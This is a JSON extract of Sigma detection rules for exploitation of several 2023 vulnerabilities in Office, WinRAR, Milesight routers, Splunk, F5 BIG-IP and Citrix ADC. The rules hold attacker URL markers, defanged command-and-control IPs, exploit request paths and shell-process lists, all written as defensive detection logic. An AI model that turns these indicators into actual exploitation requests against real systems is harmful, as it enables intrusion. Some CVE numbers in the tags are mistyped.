    "content": "title: Potential CVE-2023-36884 Exploitation Dropped File\nid: 8023d3a2-dcdc-44da-8fa9-5c7906e55b38\nstatus: test\ndescription: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\n    - https://twitter.com/wdormann/status/1679184475677130755\n    - https://twitter.com/r00tbsd/status/1679042071477338114/photo/1\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Roaming\\Microsoft\\Office\\Recent\\'\n        TargetFilename|endswith: '\\file001.url'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation Pattern\nid: 0066d244-c277-4c3e-88ec-9e7b777cc8bc\nstatus: test\ndescription: Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|contains: '/MSHTML_C7/'\n        c-uri|re: '\\?d=[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce_extenstion_ip_pattern_traffic.yml",
    "content": "title: Potential CVE-2303-36884 URL Request Pattern Traffic\nid: d9365e39-febd-4a4b-8441-3ca91bb9d333\nstatus: test\ndescription: Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCOM potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    # Examples:\n    #   hxxp://74.50[.]94[.]156/MSHTML_C7/zip_k.asp?d=99.99.99.99.\n    #   104.234[.]239[.]26/share1/MSHTML_C7/1/99.99.99.99_a15fa_file001.htm?d=99.99.99.99_ a15fa_\n    selection:\n        cs-method: 'GET'\n        c-uri|re: '\\.(zip|asp|htm|url|xml|chm|mht|vbs|search-ms)\\?d=[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce_traffic.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation - File Downloads\nid: 6af1617f-c179-47e3-bd66-b28034a1052d\nstatus: test\ndescription: Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|contains:\n            - '/ex001.url'\n            - '/file001.search-ms'\n            - '/file001.url'\n            - '/file001.vbs'\n            - '/file1.mht'\n            - '/o2010.asp'\n            - '/redir_obj.html'\n            - '/RFile.asp'\n            - '/zip_k.asp'\n            - '/zip_k2.asp'\n            - '/zip_k3.asp'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/proxy_exploit_cve_2023_36884_office_windows_html_rce_url_marker_traffic.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation - URL Marker\nid: e59f71ff-c042-4f7a-8a82-8f53beea817e\nstatus: test\ndescription: Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior\ndate: 2023-07-12\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        c-uri|contains: '/MSHTML_C7/'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml",
    "content": "title: Potential CVE-2023-36884 Exploitation - Share Access\nid: 3df95076-9e78-4e63-accb-16699c3b74f8\nstatus: test\ndescription: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-13\ntags:\n    - attack.command-and-control\n    - cve.2023-36884\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Object Access > Audit File Share\" must be configured for Success/Failure'\ndetection:\n    selection_eid:\n        EventID: 5140\n    selection_share_name:\n        ShareName|contains: '\\MSHTML_C7\\'\n        ShareName|re: '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    selection_share_path:\n        ShareLocalPath|contains: '\\MSHTML_C7\\'\n        ShareLocalPath|re: '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n    condition: selection_eid and 1 of selection_share_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml",
    "content": "title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File\nid: e4556676-fc5c-4e95-8c39-5ef27791541f\nrelated:\n    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343\n      type: similar\nstatus: test\ndescription: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331\nreferences:\n    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-30\ntags:\n    - attack.execution\n    - cve.2023-38331\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\WinRAR.exe'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\Rar$'\n        TargetFilename|re: '\\.[a-zA-Z0-9]{1,4} \\.'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml",
    "content": "title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process\nid: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343\nrelated:\n    - id: e4556676-fc5c-4e95-8c39-5ef27791541f\n      type: similar\nstatus: test\ndescription: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.\nreferences:\n    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md\nauthor: Nasreddine Bencherchali (Nextron Systems), Andreas Braathen (mnemonic.io)\ndate: 2023-08-30\nmodified: 2024-01-22\ntags:\n    - detection.emerging-threats\n    - attack.execution\n    - attack.t1203\n    - cve.2023-38331\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\WinRAR.exe'\n    selection_folder:\n        CommandLine|contains: '\\AppData\\Local\\Temp\\Rar$'\n    selection_double_ext:\n        CommandLine|re: '\\.[a-zA-Z0-9]{1,4} \\.'\n    selection_binaries:\n        # Note: add additional binaries that the attacker might use\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wscript.exe'\n        - OriginalFileName:\n              - 'Cmd.Exe'\n              - 'cscript.exe'\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wscript.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml",
    "content": "title: CVE-2023-40477 Potential Exploitation - .REV File Creation\nid: c3bd6c55-d495-4c34-918e-e03e8828c074\nstatus: test\ndescription: Detects the creation of \".rev\" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.\nreferences:\n    - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/\n    - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC\n    - https://www.rarlab.com/vuln_rev3_names.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.execution\n    - cve.2023-40477\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\explorer.exe' # When extracted via context menu\n            - '\\WinRAR.exe'\n        TargetFilename|endswith: '.rev'\n    condition: selection\nfalsepositives:\n    - Legitimate extraction of multipart or recovery volumes ZIP files\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml",
    "content": "title: CVE-2023-40477 Potential Exploitation - WinRAR Application Crash\nid: e5a29b54-6fe7-4258-8a23-82960e31231a\nstatus: test\ndescription: Detects a crash of \"WinRAR.exe\" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477\nreferences:\n    - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/\n    - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC\n    - https://www.rarlab.com/vuln_rev3_names.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-31\ntags:\n    - attack.execution\n    - cve.2023-40477\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: application\ndetection:\n    selection:\n        Provider_Name: 'Application Error'\n        EventID: 1000\n        AppName: 'WinRAR.exe'\n    filter_main_fixed_version:\n        # TODO: fix this when the \"lt\" modifier is implemented for software versions\n        AppVersion|startswith:\n            - '6.23.'\n            - '6.24.'\n            - '6.25.'\n            - '6.26.'\n            - '7.'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate crash for reasons other than exploitation of the vulnerability\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-43261/proxy_exploit_cve_2023_43261_milesight_information_disclosure.yml",
    "content": "title: Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy\nid: f48f5368-355c-4a1b-8bf5-11c13d589eaa\nrelated:\n    - id: a2bcca38-9f3a-4d5e-b603-0c587e8569d7\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in proxy logs.\nreferences:\n    - https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html\n    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf\n    - https://github.com/win3zz/CVE-2023-43261\n    - https://vulncheck.com/blog/real-world-cve-2023-43261\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-10-20\nmodified: 2023-10-30\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-43621\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        # Note: In theory the path can also be for other files. But since the logs can contains password and interesting information. Its most likely going to be targeted during a real attack\n        c-uri|contains: '/lang/log/httpd.log' # Als covered .old\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-43261/web_exploit_cve_2023_43261_milesight_information_disclosure.yml",
    "content": "title: Potential Information Disclosure CVE-2023-43261 Exploitation - Web\nid: a2bcca38-9f3a-4d5e-b603-0c587e8569d7\nrelated:\n    - id: f48f5368-355c-4a1b-8bf5-11c13d589eaa\n      type: similar\nstatus: test\ndescription: |\n    Detects exploitation attempts of CVE-2023-43261 and information disclosure in Milesight UR5X, UR32L, UR32, UR35, UR41 before v35.3.0.7 that allows attackers to access sensitive router components in access logs.\nreferences:\n    - https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html\n    - https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf\n    - https://github.com/win3zz/CVE-2023-43261\n    - https://vulncheck.com/blog/real-world-cve-2023-43261\nauthor: Nasreddine Bencherchali (Nextron Systems), Thurein Oo\ndate: 2023-10-20\nmodified: 2023-10-30\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-43621\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Requirements: In order for this detection to trigger, access logs of the router must be collected.'\ndetection:\n    selection:\n        cs-method: 'GET'\n        # Note: In theory the path can also be for other files. But since the logs can contains password and interesting information. Its most likely going to be targeted during a real attack\n        cs-uri-stem|contains: '/lang/log/httpd.log' # Als covered .old\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46214/web_cve_2023_46214_rce_splunk_enterprise.yml",
    "content": "title: Potential CVE-2023-46214 Exploitation Attempt\nid: 04017cd5-621e-4ec4-a762-1f042fe3d3e5\nrelated:\n    - id: ba5268de-4dd4-4d5c-8a90-2b5e6dc1aff8\n      type: derived\nstatus: test\ndescription: |\n    Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing\nreferences:\n    - https://github.com/nathan31337/Splunk-RCE-poc/\n    - https://blog.hrncirik.net/cve-2023-46214-analysis\n    - https://advisory.splunk.com/advisories/SVD-2023-1104\nauthor: Nasreddine Bencherchali (Nextron Systems), Bhavin Patel (STRT)\ndate: 2023-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - cve.2023-46214\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: POST\n        cs-uri-query|contains|all:\n            - 'NO_BINARY_CHECK=1'\n            - 'input.path'\n        cs-uri-query|endswith: '.xsl'\n        sc-status:\n            - 200\n            - 302\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46214/web_cve_2023_46214_rce_splunk_enterprise_poc.yml",
    "content": "title: Exploitation Attempt Of CVE-2023-46214 Using Public POC Code\nid: ba5268de-4dd4-4d5c-8a90-2b5e6dc1aff8\nrelated:\n    - id: 04017cd5-621e-4ec4-a762-1f042fe3d3e5\n      type: derived\nstatus: test\ndescription: |\n    Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code\nreferences:\n    - https://github.com/nathan31337/Splunk-RCE-poc/\n    - https://blog.hrncirik.net/cve-2023-46214-analysis\n    - https://advisory.splunk.com/advisories/SVD-2023-1104\nauthor: Lars B. P. Frydenskov(Trifork Security)\ndate: 2023-11-27\ntags:\n    - attack.lateral-movement\n    - attack.t1210\n    - cve.2023-46214\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection_method_and_response:\n        cs-method: POST\n        sc-status:\n            - 200\n            - 302\n    selection_uri_upload:\n        cs-uri-stem|contains: '/splunkd/__upload/indexing/preview'\n        cs-uri-query|contains|all:\n            - 'NO_BINARY_CHECK=1'\n            - 'input.path=shell.xsl'\n    selection_uri_search:\n        cs-uri-stem|contains|all:\n            - '/api/search/jobs'\n            - '/results'\n        cs-uri-query|contains|all:\n            - '/opt/splunk/var/run/splunk/dispatch/'\n            - '/shell.xsl'\n    condition: selection_method_and_response and 1 of selection_uri_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46747/proxy_cve_2023_46747_f5_remote_code_execution.yml",
    "content": "title: CVE-2023-46747 Exploitation Activity - Proxy\nid: f195b2ff-e542-41bf-8d91-864fb81e5c20\nrelated:\n    - id: e9928831-ba14-42ea-a4bc-33d352b9929a\n      type: similar\nstatus: test\ndescription: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.\nreferences:\n    - https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main\n    - https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml\n    - https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg\n    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-08\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-46747\n    - detection.emerging-threats\nlogsource:\n    category: proxy\n    definition: 'Requirements: The POST request body data must be collected in order to make use of this detection'\ndetection:\n    selection:\n        cs-method: 'POST'\n        c-uri|contains: '/mgmt/tm/util/bash'\n    keywords_hex:\n        '|all':\n            - '2f746d75692f436f6e74726f6c2f666f726d' # /tmui/Control/form\n            - '666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a7370' # form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp\n    keywords_plain:\n        '|all':\n            - '/tmui/Control/form'\n            - 'form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp'\n    condition: selection and (keywords_hex or keywords_plain)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-46747/web_cve_2023_46747_f5_remote_code_execution.yml",
    "content": "title: CVE-2023-46747 Exploitation Activity - Webserver\nid: e9928831-ba14-42ea-a4bc-33d352b9929a\nrelated:\n    - id: f195b2ff-e542-41bf-8d91-864fb81e5c20\n      type: similar\nstatus: test\ndescription: Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.\nreferences:\n    - https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main\n    - https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml\n    - https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg\n    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-08\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-46747\n    - detection.emerging-threats\nlogsource:\n    category: webserver\n    definition: 'Requirements: The POST request body data must be collected in order to make use of this detection'\ndetection:\n    selection:\n        cs-method: 'POST'\n        cs-uri-stem|contains: '/mgmt/tm/util/bash'\n    keywords_hex:\n        '|all':\n            - '2f746d75692f436f6e74726f6c2f666f726d' # /tmui/Control/form\n            - '666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a7370' # form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp\n    keywords_plain:\n        '|all':\n            - '/tmui/Control/form'\n            - 'form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp'\n    condition: selection and (keywords_hex or keywords_plain)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml",
    "content": "title: CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy\nid: aee7681f-b53d-4594-a9de-ac51e6ad3362\nrelated:\n    - id: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0 # Webserver Attempt\n      type: similar\n    - id: ff349b81-617f-4af4-924f-dbe8ea9bab41 # Proxy Attempt\n      type: similar\n    - id: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1 # Webserver Exploit\n      type: similar\nstatus: test\ndescription: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri|contains: '/oauth/idp/.well-known/openid-configuration'\n        cs-host|re: '.{150}'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/proxy_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml",
    "content": "title: CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy\nid: ff349b81-617f-4af4-924f-dbe8ea9bab41\nrelated:\n    - id: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0 # Webserver Attempt\n      type: similar\n    - id: aee7681f-b53d-4594-a9de-ac51e6ad3362 # Proxy Exploit\n      type: similar\n    - id: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1 # Webserver Exploit\n      type: similar\nstatus: test\ndescription: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael Haag (STRT)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: proxy\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri|contains: '/oauth/idp/.well-known/openid-configuration'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit.yml",
    "content": "title: CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver\nid: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0\nrelated:\n    - id: ff349b81-617f-4af4-924f-dbe8ea9bab41 # Proxy Attempt\n      type: similar\n    - id: aee7681f-b53d-4594-a9de-ac51e6ad3362 # Proxy Exploit\n      type: similar\n    - id: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1 # Webserver Exploit\n      type: similar\nstatus: test\ndescription: Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems), Michael Haag (STRT)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem|contains: '/oauth/idp/.well-known/openid-configuration'\n        sc-status: 200\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/CVE-2023-4966/web_exploit_cve_2023_4966_citrix_sensitive_information_disclosure_exploit_attempt.yml",
    "content": "title: CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver\nid: a4e068b5-e27c-4f21-85b3-e69e5a4f7ce1\nrelated:\n    - id: 87c83d8e-5390-44ce-aa4a-d3b37e54d0a0 # Webserver Attempt\n      type: similar\n    - id: ff349b81-617f-4af4-924f-dbe8ea9bab41 # Proxy Attempt\n      type: similar\n    - id: aee7681f-b53d-4594-a9de-ac51e6ad3362 # Proxy Exploit\n      type: similar\nstatus: test\ndescription: Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.\nreferences:\n    - https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\n    - https://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\n    - https://www.rapid7.com/blog/post/2023/10/25/etr-cve-2023-4966-exploitation-of-citrix-netscaler-information-disclosure-vulnerability/\n    - https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966\n    - https://github.com/assetnote/exploits/tree/main/citrix/CVE-2023-4966\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-28\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - cve.2023-4966\n    - detection.emerging-threats\nlogsource:\n    category: webserver\ndetection:\n    selection:\n        cs-method: 'GET'\n        cs-uri-stem|contains: '/oauth/idp/.well-known/openid-configuration'\n        cs-host|re: '.{150}'\n    condition: selection\nfalsepositives:\n    - Vulnerability scanners\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml",
    "content": "title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE\nid: 6d5b8176-d87d-4402-8af4-53aee9db7b5d\nstatus: test\ndescription: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)\nreferences:\n    - https://github.com/SigmaHQ/sigma/pull/3946\n    - https://twitter.com/hackerfantastic/status/1616455335203438592?s=20\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali\ndate: 2023-01-21\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\svchost.exe'\n        Image|endswith: '\\svchost.exe'\n        ParentCommandLine|contains: '-k DHCPServer'\n        CommandLine|contains: '-k DHCPServer'\n        User|contains: # Covers many language settings for Network Service. Please expand.\n            - 'NETWORK SERVICE'\n            - 'NETZWERKDIENST'\n            - 'SERVIZIO DI RETE'\n            - 'SERVICIO DE RED'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2023/Malware/COLDSTEEL/README.md",
